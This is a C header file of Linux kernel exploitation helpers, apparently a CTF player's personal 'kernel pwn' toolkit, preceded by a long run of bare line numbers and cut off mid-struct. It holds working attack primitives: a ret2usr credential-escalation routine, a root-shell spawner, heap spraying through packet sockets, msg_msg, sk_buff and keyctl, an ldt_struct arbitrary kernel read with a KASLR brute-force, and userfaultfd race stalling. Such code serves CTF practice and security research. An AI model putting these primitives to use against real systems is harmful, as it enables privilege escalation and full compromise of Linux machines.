156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
1050
1051
1052
1053
1054
1055
1056
1057
1058
1059
1060
1061
1062
1063
1064
1065
1066
1067
1068
1069
1070
1071
1072
1073
1074
1075
1076
1077
1078
1079
1080
1081
1082
1083
1084
1085
1086
1087
1088
1089
1090
1091
1092
1093
1094
1095
1096
1097
1098
1099
1100
1101
1102
1103
1104
1105
1106
1107
1108
1109
1110
/**
* @file kernel.h
* @author arttnba3 (arttnba@gmail.com)
* @brief arttnba3's personal utils for kernel pwn
* @version 1.1
* @date 2023-05-20
*
* @copyright Copyright (c) 2023 arttnba3
*
*/
#ifndef A3_KERNEL_PWN_H
#define A3_KERNEL_PWN_H

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>

/**
* I - fundamental functions
* e.g. CPU-core binder, user-status saver, etc.
*/

uint64_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
uint64_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
uint64_t init_task, init_nsproxy, init_cred;

size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
size_t page_count;

page_count = ((direct_map_addr & (~0xfff)) - page_offset_base) / 0x1000;

return vmemmap_base + page_count * 0x40;
}

int print_hex(void *p, int size){
int i;
unsigned char *buf = (unsigned char *)p;

if(size % sizeof(void *))
{
return 1;
}
printf("--------------------------------------------------------------------------------\n");
for (i = 0; i < size; i += sizeof(void *)){
printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%lx\n",
i, buf[i+0], buf[i+1], buf[i+2], buf[i+3], buf[i+4], buf[i+5], buf[i+6], buf[i+7], *(unsigned long*)&buf[i]);
}
return 0;
}

void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}

/* root checker and shell poper */
void get_root_shell(void)
{
puts("[*] Checking for root...");

if(getuid()) {
puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
sleep(5);
exit(EXIT_FAILURE);
}

puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

system("/bin/sh");

/* to exit the process normally, instead of segmentation fault */
exit(EXIT_SUCCESS);
}

/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/* bind the process to specific core */
void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/* for ret2usr attacker */
void get_root_privilige(size_t prepare_kernel_cred, size_t commit_creds)
{
void *(*prepare_kernel_cred_ptr)(void *) =
(void *(*)(void*)) prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = (int (*)(void*)) commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}

/**
* @brief create an isolate namespace
* note that the caller **SHOULD NOT** be used to get the root, but an operator
* to perform basic exploiting operations in it only
*/
void unshare_setup(void)
{
char edit[0x100];
int tmp_fd;

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}

/**
* II - fundamental kernel structures
* e.g. list_head
*/
struct list_head {
uint64_t next;
uint64_t prev;
};

/**
* III - pgv pages sprayer related
* not that we should create two process:
* - the parent is the one to send cmd and get root
* - the child creates an isolate userspace by calling unshare_setup(),
* receiving cmd from parent and operates it only
*/
#define PGV_PAGE_NUM 1000
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

/* each allocation is (size * nr) bytes, aligned to PAGE_SIZE */
struct pgv_page_request {
int idx;
int cmd;
unsigned int size;
unsigned int nr;
};

/* operations type */
enum {
CMD_ALLOC_PAGE,
CMD_FREE_PAGE,
CMD_EXIT,
};

/* pipe for cmd communication */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/* create a socket and alloc pages, return the socket fd */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
/* tpacket version for setsockopt */
struct tpacket_req req;
int socket_fd, version;
int ret;

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
ret = socket_fd;
goto err_out;
}

version = TPACKET_V1;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_VERSION)\n");
goto err_setsockopt;
}

memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
goto err_setsockopt;
}

return socket_fd;

err_setsockopt:
close(socket_fd);
err_out:
return ret;
}

int packet_socket_setup(uint32_t block_size, uint32_t frame_size,
uint32_t block_nr, uint32_t sizeof_priv, int timeout) {
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0)
{
perror("[-] socket (AF_PACKET)");
exit(1);
}

int v = TPACKET_V3;
int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
if (rv < 0)
{
perror("[-] setsockopt (PACKET_VERSION)");
exit(1);
}

struct tpacket_req3 req3;
memset(&req3, 0, sizeof(req3));
req3.tp_sizeof_priv = sizeof_priv;
req3.tp_block_nr = block_nr;
req3.tp_block_size = block_size;
req3.tp_frame_size = frame_size;
req3.tp_frame_nr = (block_size * block_nr) / frame_size;
req3.tp_retire_blk_tov = timeout;
req3.tp_feature_req_word = 0;

rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (rv < 0)
{
perror("[-] setsockopt (PACKET_RX_RING)");
exit(1);
}

struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_family = PF_PACKET;
sa.sll_protocol = htons(ETH_P_ALL);
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_hatype = 0;
sa.sll_halen = 0;
sa.sll_pkttype = 0;
sa.sll_halen = 0;

rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
if (rv < 0)
{
perror("[-] bind (AF_PACKET)");
exit(1);
}

return s;
}

/* the parent process should call it to send command of allocation to child */
int alloc_page(int idx, unsigned int size, unsigned int nr)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = CMD_ALLOC_PAGE,
.size = size,
.nr = nr,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

/* the parent process should call it to send command of freeing to child */
int free_page(int idx)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = CMD_FREE_PAGE,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(req));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

/* the child, handler for commands from the pipe */
void spray_cmd_handler(void)
{
struct pgv_page_request req;
int socket_fd[PGV_PAGE_NUM];
int ret;

/* create an isolate namespace*/
unshare_setup();

/* handler request */
do {
read(cmd_pipe_req[0], &req, sizeof(req));

if (req.cmd == CMD_ALLOC_PAGE) {
ret = create_socket_and_alloc_pages(req.size, req.nr);
socket_fd[req.idx] = ret;
} else if (req.cmd == CMD_FREE_PAGE) {
ret = close(socket_fd[req.idx]);
} else {
printf("[x] invalid request: %d\n", req.cmd);
}

write(cmd_pipe_reply[1], &ret, sizeof(ret));
} while (req.cmd != CMD_EXIT);
}

#define PIPE_SPRAY_NUM 200

#define PGV_1PAGE_SPRAY_NUM 0x20

#define PGV_4PAGES_START_IDX PGV_1PAGE_SPRAY_NUM
#define PGV_4PAGES_SPRAY_NUM 0x40

#define PGV_8PAGES_START_IDX (PGV_4PAGES_START_IDX + PGV_4PAGES_SPRAY_NUM)
#define PGV_8PAGES_SPRAY_NUM 0x40

int pgv_1page_start_idx = 0;
int pgv_4pages_start_idx = PGV_4PAGES_START_IDX;
int pgv_8pages_start_idx = PGV_8PAGES_START_IDX;

/* init pgv-exploit subsystem :) */
void prepare_pgv_system(void)
{
/* pipe for pgv */
pipe(cmd_pipe_req);
pipe(cmd_pipe_reply);

/* child process for pages spray */
if (!fork()) {
spray_cmd_handler();
}
}

void prepare_pgv_pages(void)
{
/**
* We want a more clear and continuous memory there, which require us to
* make the noise less in allocating order-3 pages.
* So we pre-allocate the pages for those noisy objects there.
*/
puts("[*] spray pgv order-0 pages...");
for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++) {
if (alloc_page(i, 0x1000, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("[*] spray pgv order-2 pages...");
for (int i = 0; i < PGV_4PAGES_SPRAY_NUM; i++) {
if (alloc_page(PGV_4PAGES_START_IDX + i, 0x1000 * 4, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

/* spray 8 pages for page-level heap fengshui */
puts("[*] spray pgv order-3 pages...");
for (int i = 0; i < PGV_8PAGES_SPRAY_NUM; i++) {
/* a socket need 1 obj: sock_inode_cache, 19 objs for 1 slub on 4 page*/
if (i % 19 == 0) {
free_page(pgv_4pages_start_idx++);
}

/* a socket need 1 dentry: dentry, 21 objs for 1 slub on 1 page */
if (i % 21 == 0) {
free_page(pgv_1page_start_idx += 2);
}

/* a pgv need 1 obj: kmalloc-8, 512 objs for 1 slub on 1 page*/
if (i % 512 == 0) {
free_page(pgv_1page_start_idx += 2);
}

if (alloc_page(PGV_8PAGES_START_IDX + i, 0x1000 * 8, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("");
}

/**
* IV - keyctl related
*/

/**
* The MUSL also doesn't contain `keyctl.h` :(
* Luckily we just need a bit of micros in exploitation,
* so just define them directly is okay :)
*/

#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specific keyring */
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's contents */

int key_alloc(char *description, void *payload, size_t plen)
{
return syscall(__NR_add_key, "user", description, payload, plen,
KEY_SPEC_PROCESS_KEYRING);
}

int key_update(int keyid, void *payload, size_t plen)
{
return syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);
}

int key_read(int keyid, void *buffer, size_t buflen)
{
return syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);
}

int key_revoke(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);
}

int key_unlink(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_UNLINK, keyid, KEY_SPEC_PROCESS_KEYRING);
}

/**
* V - sk_buff spraying related
* note that the sk_buff's tail is with a 320-bytes skb_shared_info
*/
#define SOCKET_NUM 8
#define SK_BUFF_NUM 128

/**
* socket's definition should be like:
* int sk_sockets[SOCKET_NUM][2];
*/

int init_socket_array(int sk_socket[SOCKET_NUM][2])
{
/* socket pairs to spray sk_buff */
for (int i = 0; i < SOCKET_NUM; i++) {
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[i]) < 0) {
printf("[x] failed to create no.%d socket pair!\n", i);
return -1;
}
}

return 0;
}

int spray_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (write(sk_socket[i][0], buf, size) < 0) {
printf("[x] failed to spray %d sk_buff for %d socket!", j, i);
return -1;
}
}
}

return 0;
}

int free_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (read(sk_socket[i][1], buf, size) < 0) {
puts("[x] failed to received sk_buff!");
return -1;
}
}
}

return 0;
}

/**
* VI - msg_msg related
*/

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

struct msg_msg {
struct list_head m_list;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};

struct msg_msgseg {
uint64_t next;
};

/*
struct msgbuf {
long mtype;
char mtext[0];
};
*/

int get_msg_queue(void)
{
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

ssize_t read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
* the msgp should be a pointer to the `struct msgbuf`,
* and the data should be stored in msgbuf.mtext
*/
ssize_t write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
((struct msgbuf*)msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
ssize_t peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp,
MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security)
{
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}

/**
* VII - ldt_struct related
*/

/**
* Somethings we may want to compile the exp binary with MUSL-GCC, which
* doesn't contain the `asm/ldt.h` file.
* As the file is small, I copy that directly to here :)
*/

/* Maximum number of LDT entries supported. */
#define LDT_ENTRIES 8192
/* The size of each LDT entry. */
#define LDT_ENTRY_SIZE 8

#ifndef __ASSEMBLY__
/*
* Note on 64bit base and limit is ignored and you cannot set DS/ES/CS
* not to the default values if you still want to do syscalls. This
* call is more for 32bit mode therefore.
*/
struct user_desc {
unsigned int entry_number;
unsigned int base_addr;
unsigned int limit;
unsigned int seg_32bit:1;
unsigned int contents:2;
unsigned int read_exec_only:1;
unsigned int limit_in_pages:1;
unsigned int seg_not_present:1;
unsigned int useable:1;
#ifdef __x86_64__
/*
* Because this bit is not present in 32-bit user code, user
* programs can pass uninitialized values here. Therefore, in
* any context in which a user_desc comes from a 32-bit program,
* the kernel must act as though lm == 0, regardless of the
* actual value.
*/
unsigned int lm:1;
#endif
};

#define MODIFY_LDT_CONTENTS_DATA 0
#define MODIFY_LDT_CONTENTS_STACK 1
#define MODIFY_LDT_CONTENTS_CODE 2

#endif /* !__ASSEMBLY__ */

/* this should be referred to your kernel */
#define SECONDARY_STARTUP_64 0xffffffff81000060

/* desc initializer */
static inline void init_desc(struct user_desc *desc)
{
/* init descriptor info */
desc->base_addr = 0xff0000;
desc->entry_number = 0x8000 / 8;
desc->limit = 0;
desc->seg_32bit = 0;
desc->contents = 0;
desc->limit_in_pages = 0;
desc->lm = 0;
desc->read_exec_only = 0;
desc->seg_not_present = 0;
desc->useable = 0;
}

/**
* @brief burte-force hitting page_offset_base by modifying ldt_struct
*
* @param ldt_cracker function to make the ldt_struct modifiable
* @param cracker_args args of ldt_cracker
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param burte_size size of each burte-force hitting
* @return size_t address of page_offset_base
*/
size_t ldt_guessing_direct_mapping_area(void *(*ldt_cracker)(void*),
void *cracker_args,
void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args,
uint64_t burte_size)
{
struct user_desc desc;
uint64_t page_offset_base = 0xffff888000000000;
uint64_t temp;
char *buf;
int retval;

/* init descriptor info */
init_desc(&desc);

/* make the ldt_struct modifiable */
ldt_cracker(cracker_args);
syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));

/* leak kernel direct mapping area by modify_ldt() */
while(1) {
ldt_momdifier(momdifier_args, page_offset_base);
retval = syscall(SYS_modify_ldt, 0, &temp, 8);
if (retval > 0) {
break;
}
else if (retval == 0) {
printf("[x] no mm->context.ldt!");
page_offset_base = -1;
break;
}
page_offset_base += burte_size;
}

return page_offset_base;
}

/**
* @brief read the contents from a specific kernel memory.
* Note that we should call ldtGuessingDirectMappingArea() firstly,
* and the function should be used in that caller process
*
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param addr address of kernel memory to read
* @param res_buf buf to be written the data from kernel memory
*/
void ldt_arbitrary_read(void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args, size_t addr, char *res_buf)
{
static char buf[0x8000];
struct user_desc desc;
uint64_t temp;
int pipe_fd[2];

/* init descriptor info */
init_desc(&desc);

/* modify the ldt_struct->entries to addr */
ldt_momdifier(momdifier_args, addr);

/* read data by the child process */
pipe(pipe_fd);
if (!fork()) {
/* child */
syscall(SYS_modify_ldt, 0, buf, 0x8000);
write(pipe_fd[1], buf, 0x8000);
exit(0);
} else {
/* parent */
wait(NULL);
read(pipe_fd[0], res_buf, 0x8000);
}

close(pipe_fd[0]);
close(pipe_fd[1]);
}

/**
* @brief seek specific content in the memory.
* Note that we should call ldtGuessingDirectMappingArea() firstly,
* and the function should be used in that caller process
*
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param page_offset_base the page_offset_base we leakked before
* @param mem_finder your own function to search on a 0x8000-bytes buf.
* It should be like `size_t func(void *args, char *buf)` and the `buf`
* is where we store the data from kernel in ldt_seeking_memory().
* The return val should be the offset of the `buf`, `-1` for failure
* @param finder_args your own function's args
* @return size_t kernel addr of content to find, -1 for failure
*/
size_t ldt_seeking_memory(void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args, uint64_t page_offset_base,
size_t (*mem_finder)(void*, char *), void *finder_args)
{
static char buf[0x8000];
size_t search_addr, result_addr = -1, offset;

search_addr = page_offset_base;

while (1) {
ldt_arbitrary_read(ldt_momdifier, momdifier_args, search_addr, buf);

offset = mem_finder(finder_args, buf);
if (offset != -1) {
result_addr = search_addr + offset;
break;
}

search_addr += 0x8000;
}

return result_addr;
}

/**
* VIII - userfaultfd related code
*/

/**
* The MUSL also doesn't contain `userfaultfd.h` :(
* Luckily we just need a bit of micros in exploitation,
* so just define them directly is okay :)
*/

#define UFFD_API ((uint64_t)0xAA)
#define _UFFDIO_REGISTER (0x00)
#define _UFFDIO_COPY (0x03)
#define _UFFDIO_API (0x3F)

/* userfaultfd ioctl ids */
#define UFFDIO 0xAA
#define UFFDIO_API _IOWR(UFFDIO, _UFFDIO_API, \
struct uffdio_api)
#define UFFDIO_REGISTER _IOWR(UFFDIO, _UFFDIO_REGISTER, \
struct uffdio_register)
#define UFFDIO_COPY _IOWR(UFFDIO, _UFFDIO_COPY, \
struct uffdio_copy)

/* read() structure */
struct uffd_msg {
uint8_t event;

uint8_t reserved1;
uint16_t reserved2;
uint32_t reserved3;

union {
struct {
uint64_t flags;
uint64_t address;
union {
uint32_t ptid;
} feat;
} pagefault;

struct {
uint32_t ufd;
} fork;

struct {
uint64_t from;
uint64_t to;
uint64_t len;
} remap;

struct {
uint64_t start;
uint64_t end;
} remove;

struct {
/* unused reserved fields */
uint64_t reserved1;
uint64_t reserved2;
uint64_t reserved3;
} reserved;
} arg;
} __attribute__((packed));

#define UFFD_EVENT_PAGEFAULT 0x12

struct uffdio_api {
uint64_t api;
uint64_t features;
uint64_t ioctls;
};

struct uffdio_range {
uint64_t start;
uint64_t len;
};

struct uffdio_register {
struct uffdio_range range;
#define UFFDIO_REGISTER_MODE_MISSING ((uint64_t)1<<0)
#define UFFDIO_REGISTER_MODE_WP ((uint64_t)1<<1)
uint64_t mode;
uint64_t ioctls;
};


struct uffdio_copy {
uint64_t dst;
uint64_t src;
uint64_t len;
#define UFFDIO_COPY_MODE_DONTWAKE ((uint64_t)1<<0)
uint64_t mode;
int64_t copy;
};

//#include <linux/userfaultfd.h>

char temp_page_for_stuck[0x1000];

void register_userfaultfd(pthread_t *monitor_thread, void *addr,
unsigned long len, void *(*handler)(void*))
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;

/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1) {
err_exit("userfaultfd");
}

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
err_exit("ioctl-UFFDIO_API");
}

uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
err_exit("ioctl-UFFDIO_REGISTER");
}

s = pthread_create(monitor_thread, NULL, handler, (void *) uffd);
if (s != 0) {
err_exit("pthread_create");
}
}

void *uffd_handler_for_stucking_thread(void *args)
{
struct uffd_msg msg;
int fault_cnt = 0;
long uffd;

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long) args;

for (;;) {
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);

if (nready == -1) {
err_exit("poll");
}

nread = read(uffd, &msg, sizeof(msg));

/* just stuck there is okay... */
sleep(100000000);

if (nread == 0) {
err_exit("EOF on userfaultfd!\n");
}

if (nread == -1) {
err_exit("read");
}

if (msg.event != UFFD_EVENT_PAGEFAULT) {
err_exit("Unexpected event on userfaultfd\n");
}

uffdio_copy.src = (unsigned long long) temp_page_for_stuck;
uffdio_copy.dst = (unsigned long long) msg.arg.pagefault.address &
~(0x1000 - 1);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
err_exit("ioctl-UFFDIO_COPY");
}

return NULL;
}
}

void register_userfaultfd_for_thread_stucking(pthread_t *monitor_thread,
void *buf, unsigned long len)
{
register_userfaultfd(monitor_thread, buf, len,
uffd_handler_for_stucking_thread);
}


/**
* IX - kernel structures
*/

struct file;
struct file_operations;
struct tty_struct;
struct tty_driver;
struct serial_icounter_struct;
struct ktermios;
struct termiox;
struct seq_operations;

struct seq_file {
char *buf;
size_t size;
size_t from;
size_t count;
size_t pad_until;
loff_t index;
loff_t read_pos;
uint64_t lock[4]; //struct mutex lock;
const struct seq_operations *op;
int poll_event;
const struct file *file;
void *private;
};

struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};

struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
int (*write_room)(struct tty_struct *tty);
int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
const struct file_operations *proc_fops;
};

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations {
